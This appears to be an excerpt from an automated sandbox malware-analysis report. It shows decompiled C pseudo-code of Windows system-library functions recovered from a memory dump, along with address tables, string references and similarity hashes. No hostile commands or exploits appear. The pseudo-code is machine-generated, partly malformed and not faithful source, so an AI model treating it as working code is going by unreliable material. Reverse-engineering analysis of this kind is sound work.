                                      0x0534e6d9
                                      0x00000000
                                      0x00000000
                                      0x0534e6e5
                                      0x0534e6ea
                                      0x0534e6f9
                                      0x0534e70b
                                      0x0534e70f
                                      0x053a5439
                                      0x053a545e
                                      0x053a545e
                                      0x00000000
                                      0x053a545e
                                      0x053a543b
                                      0x053a543e
                                      0x053a5440
                                      0x053a5445
                                      0x053a5472
                                      0x053a5475
                                      0x053a548d
                                      0x053a5493
                                      0x053a54a9
                                      0x00000000
                                      0x00000000
                                      0x053a54ab
                                      0x053a54b4
                                      0x053a54bc
                                      0x053a54c8
                                      0x053a54de
                                      0x053a54fb
                                      0x053a54e0
                                      0x053a54e6
                                      0x053a54eb
                                      0x053a54eb
                                      0x053a54de
                                      0x00000000
                                      0x053a54bc
                                      0x053a5477
                                      0x053a547a
                                      0x053a5480
                                      0x053a5483
                                      0x053a5486
                                      0x053a548b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a548b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a5447
                                      0x053a5447
                                      0x053a5447
                                      0x053a5447
                                      0x053a544e
                                      0x00000000
                                      0x00000000
                                      0x053a5450
                                      0x053a5452
                                      0x053a5455
                                      0x053a545a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x053a545c
                                      0x053a546a
                                      0x053a546d
                                      0x053a546f
                                      0x00000000
                                      0x053a546f
                                      0x0534e70f

                                      Strings
                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0534E68C
                                      • InstallLanguageFallback, xrefs: 0534E6DB
                                      • @, xrefs: 0534E6C0
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                      • API String ID: 0-1757540487
                                      • Opcode ID: ef84bc36c7ad1aed8c162d251ad93e3e3c6172643a88a7371ea9b7af56c26e76
                                      • Instruction ID: 9955dd7c80fc48eaba6e57aa58f25de903cab7aa101e4157af3f460122b238c6
                                      • Opcode Fuzzy Hash: ef84bc36c7ad1aed8c162d251ad93e3e3c6172643a88a7371ea9b7af56c26e76
                                      • Instruction Fuzzy Hash: 6E519E766083459BCB14EF64C444A7BB7E9FF88624F05092EF986D7250FB74DA04CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E0540E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0540BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0540BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0540AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E05389730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0540A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0540A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E05389730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0540A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0540A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E05362280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0535B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0535FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E05367D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E053FFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                      0x0540e547
                                      0x0540e549
                                      0x0540e54f
                                      0x0540e553
                                      0x0540e557
                                      0x0540e55a
                                      0x0540e55c
                                      0x0540e55f
                                      0x0540e561
                                      0x0540e567
                                      0x0540e56b
                                      0x0540e7e2
                                      0x00000000
                                      0x0540e571
                                      0x0540e575
                                      0x0540e577
                                      0x0540e57b
                                      0x0540e57c
                                      0x0540e57d
                                      0x0540e57e
                                      0x0540e57f
                                      0x0540e588
                                      0x0540e58f
                                      0x0540e591
                                      0x0540e592
                                      0x0540e592
                                      0x0540e596
                                      0x0540e59e
                                      0x0540e5a0
                                      0x0540e5a6
                                      0x0540e61d
                                      0x0540e61d
                                      0x0540e621
                                      0x0540e623
                                      0x0540e630
                                      0x0540e630
                                      0x0540e7e6
                                      0x0540e7eb
                                      0x0540e7ed
                                      0x0540e7f4
                                      0x0540e7fa
                                      0x0540e7ff
                                      0x0540e7ff
                                      0x0540e80a
                                      0x0540e812
                                      0x0540e812
                                      0x0540e5ab
                                      0x0540e5b4
                                      0x0540e5b9
                                      0x0540e5be
                                      0x0540e5c0
                                      0x0540e5c2
                                      0x0540e5c8
                                      0x0540e5c9
                                      0x0540e5cb
                                      0x0540e5cc
                                      0x0540e5d5
                                      0x0540e5e4
                                      0x0540e5f1
                                      0x0540e5f8
                                      0x0540e5f8
                                      0x0540e5d5
                                      0x0540e602
                                      0x0540e616
                                      0x0540e63d
                                      0x0540e644
                                      0x0540e64d
                                      0x0540e652
                                      0x0540e657
                                      0x0540e659
                                      0x0540e65b
                                      0x0540e661
                                      0x0540e662
                                      0x0540e664
                                      0x0540e665
                                      0x0540e66e
                                      0x0540e67d
                                      0x0540e68a
                                      0x0540e691
                                      0x0540e691
                                      0x0540e66e
                                      0x0540e6b0
                                      0x00000000
                                      0x0540e6b6
                                      0x0540e6bd
                                      0x0540e6c7
                                      0x0540e6d7
                                      0x0540e6d9
                                      0x0540e6db
                                      0x0540e6de
                                      0x0540e6e3
                                      0x0540e6f3
                                      0x0540e6fc
                                      0x0540e700
                                      0x0540e700
                                      0x0540e704
                                      0x0540e70a
                                      0x0540e70a
                                      0x0540e713
                                      0x0540e716
                                      0x0540e719
                                      0x0540e720
                                      0x0540e761
                                      0x0540e76b
                                      0x0540e774
                                      0x0540e77a
                                      0x0540e77a
                                      0x0540e78a
                                      0x0540e791
                                      0x0540e799
                                      0x0540e79b
                                      0x0540e79f
                                      0x0540e7aa
                                      0x0540e7c0
                                      0x0540e7ac
                                      0x0540e7b2
                                      0x0540e7b9
                                      0x0540e7b9
                                      0x0540e7c7
                                      0x0540e806
                                      0x00000000
                                      0x0540e7c9
                                      0x0540e7d1
                                      0x0540e7d8
                                      0x00000000
                                      0x0540e7d8
                                      0x00000000
                                      0x00000000
                                      0x0540e722
                                      0x0540e72e
                                      0x0540e748
                                      0x0540e74c
                                      0x0540e754
                                      0x0540e756
                                      0x0540e75c
                                      0x0540e75c
                                      0x00000000
                                      0x0540e75c
                                      0x0540e758
                                      0x0540e758
                                      0x00000000
                                      0x0540e758
                                      0x0540e750
                                      0x00000000
                                      0x00000000
                                      0x0540e752
                                      0x00000000
                                      0x0540e752
                                      0x0540e730
                                      0x0540e735
                                      0x0540e73d
                                      0x0540e73f
                                      0x00000000
                                      0x00000000
                                      0x0540e741
                                      0x0540e741
                                      0x00000000
                                      0x0540e741
                                      0x0540e739
                                      0x00000000
                                      0x00000000
                                      0x0540e73b
                                      0x00000000
                                      0x0540e73b
                                      0x0540e722
                                      0x0540e720
                                      0x0540e6b0
                                      0x0540e618
                                      0x00000000
                                      0x0540e618

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: `$`
                                      • API String ID: 0-197956300
                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction ID: 93cc96d64751d1ceac48e63900613939573b249dfcd3fbd816f8c0f151211c2a
                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                      • Instruction Fuzzy Hash: B8918D322083419BE724DE65C844BABB7EABF84714F249D6EF596CB2C0D774E824CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 77%
                                      			E053C51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x54205f0);
				E0539D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0535EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E053C53CA(0);
						return E0539D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0538F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E05363690(1, _t117, 0x5321810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0538AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L05364620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0538AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E053C500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E05389860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                      0x053c51be
                                      0x053c51c3
                                      0x053c51c8
                                      0x053c51cd
                                      0x053c51d0
                                      0x053c51d3
                                      0x053c51d8
                                      0x053c51db
                                      0x053c51de
                                      0x053c51e0
                                      0x053c51e3
                                      0x053c51e6
                                      0x053c51e8
                                      0x053c5342
                                      0x053c5351
                                      0x053c5356
                                      0x053c535a
                                      0x053c5360
                                      0x053c5363
                                      0x053c5366
                                      0x053c5369
                                      0x053c5369
                                      0x053c536b
                                      0x053c536b
                                      0x053c5370
                                      0x053c53a3
                                      0x053c53a4
                                      0x053c53a6
                                      0x053c53ab
                                      0x053c53ab
                                      0x053c53ae
                                      0x053c53ae
                                      0x053c53b5
                                      0x053c53bf
                                      0x053c53bf
                                      0x053c5375
                                      0x053c5396
                                      0x053c53a0
                                      0x053c53a0
                                      0x00000000
                                      0x053c5396
                                      0x053c5377
                                      0x053c5379
                                      0x053c537f
                                      0x053c538c
                                      0x053c5390
                                      0x00000000
                                      0x053c5390
                                      0x053c51ee
                                      0x053c51f1
                                      0x053c5301
                                      0x053c5310
                                      0x053c5315
                                      0x053c5318
                                      0x053c531b
                                      0x053c5320
                                      0x053c532e
                                      0x053c5331
                                      0x00000000
                                      0x053c5331
                                      0x053c5328
                                      0x053c5329
                                      0x00000000
                                      0x053c5329
                                      0x053c51fa
                                      0x053c5235
                                      0x053c5236
                                      0x053c5239
                                      0x053c523f
                                      0x053c5240
                                      0x053c5241
                                      0x053c5242
                                      0x053c5246
                                      0x053c5247
                                      0x053c524e
                                      0x053c5251
                                      0x053c5267
                                      0x053c5269
                                      0x053c526e
                                      0x053c527d
                                      0x053c527e
                                      0x053c5281
                                      0x053c5282
                                      0x053c5287
                                      0x053c5288
                                      0x053c528a
                                      0x053c528f
                                      0x053c5294
                                      0x00000000
                                      0x00000000
                                      0x053c529a
                                      0x053c529c
                                      0x053c529e
                                      0x053c529e
                                      0x053c52a4
                                      0x053c52b0
                                      0x00000000
                                      0x00000000
                                      0x053c52ba
                                      0x053c52bc
                                      0x053c52bc
                                      0x053c52d4
                                      0x053c52d9
                                      0x053c52dc
                                      0x053c52e1
                                      0x00000000
                                      0x00000000
                                      0x053c52e7
                                      0x053c52f4
                                      0x00000000
                                      0x053c52f4
                                      0x053c5270
                                      0x00000000
                                      0x053c5270
                                      0x053c51fc
                                      0x053c51fd
                                      0x053c5202
                                      0x053c5203
                                      0x053c5205
                                      0x053c520a
                                      0x053c520f
                                      0x00000000
                                      0x00000000
                                      0x053c521b
                                      0x053c5226
                                      0x053c522b
                                      0x053c521d
                                      0x053c521d
                                      0x053c5222
                                      0x053c5222
                                      0x053c522d
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      • API String ID: 2994545307-634100481
                                      • Opcode ID: ea4b28dc039b1ea21ed4649479b1e3f1fffdbcb9778f68b589b0db8a41a8a67d
                                      • Instruction ID: 955de25ecda86793826ee58d3a9fca0427469c472a47d4977e1a2df7ed2b3d52
                                      • Opcode Fuzzy Hash: ea4b28dc039b1ea21ed4649479b1e3f1fffdbcb9778f68b589b0db8a41a8a67d
                                      • Instruction Fuzzy Hash: B5517DB1A047189FDB25DFA8D884BADBBF9FF48700F1440ADE50AEB251DA70AD00CB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E0534B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x541f7a8);
				E0539D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0539D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0538D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0538F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0539DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0538B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0538B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0538E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0538A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                      0x0534b171
                                      0x0534b171
                                      0x0534b171
                                      0x0534b171
                                      0x0534b171
                                      0x0534b176
                                      0x0534b17b
                                      0x0534b180
                                      0x0534b186
                                      0x0534b18f
                                      0x0534b198
                                      0x0534b1a4
                                      0x0534b1aa
                                      0x053a4802
                                      0x053a4802
                                      0x053a4805
                                      0x053a480c
                                      0x053a480e
                                      0x0534b1d1
                                      0x0534b1d3
                                      0x0534b1de
                                      0x0534b1de
                                      0x053a4817
                                      0x053a481e
                                      0x053a4820
                                      0x053a4822
                                      0x053a4822
                                      0x053a4824
                                      0x053a4824
                                      0x053a482a
                                      0x00000000
                                      0x00000000
                                      0x053a4835
                                      0x053a483a
                                      0x053a483d
                                      0x053a483f
                                      0x053a4842
                                      0x053a4842
                                      0x053a4842
                                      0x053a4846
                                      0x053a484c
                                      0x053a484e
                                      0x053a4851
                                      0x053a4851
                                      0x053a4853
                                      0x053a4854
                                      0x053a4854
                                      0x053a4858
                                      0x053a485a
                                      0x053a485a
                                      0x053a485d
                                      0x053a485f
                                      0x053a4861
                                      0x053a4861
                                      0x053a4866
                                      0x053a486b
                                      0x053a486e
                                      0x053a4871
                                      0x053a4876
                                      0x053a4876
                                      0x053a4878
                                      0x053a487b
                                      0x053a4884
                                      0x053a4884
                                      0x00000000
                                      0x053a487d
                                      0x053a487d
                                      0x053a4882
                                      0x053a4889
                                      0x053a4889
                                      0x053a488f
                                      0x053a4891
                                      0x053a48e0
                                      0x053a48e2
                                      0x053a48e4
                                      0x053a48e4
                                      0x053a48e7
                                      0x053a48e7
                                      0x053a48ed
                                      0x053a48f4
                                      0x053a48f6
                                      0x053a4951
                                      0x053a4951
                                      0x053a4953
                                      0x053a4953
                                      0x053a4956
                                      0x053a4956
                                      0x053a4958
                                      0x053a4959
                                      0x053a4959
                                      0x053a495d
                                      0x053a495d
                                      0x053a495f
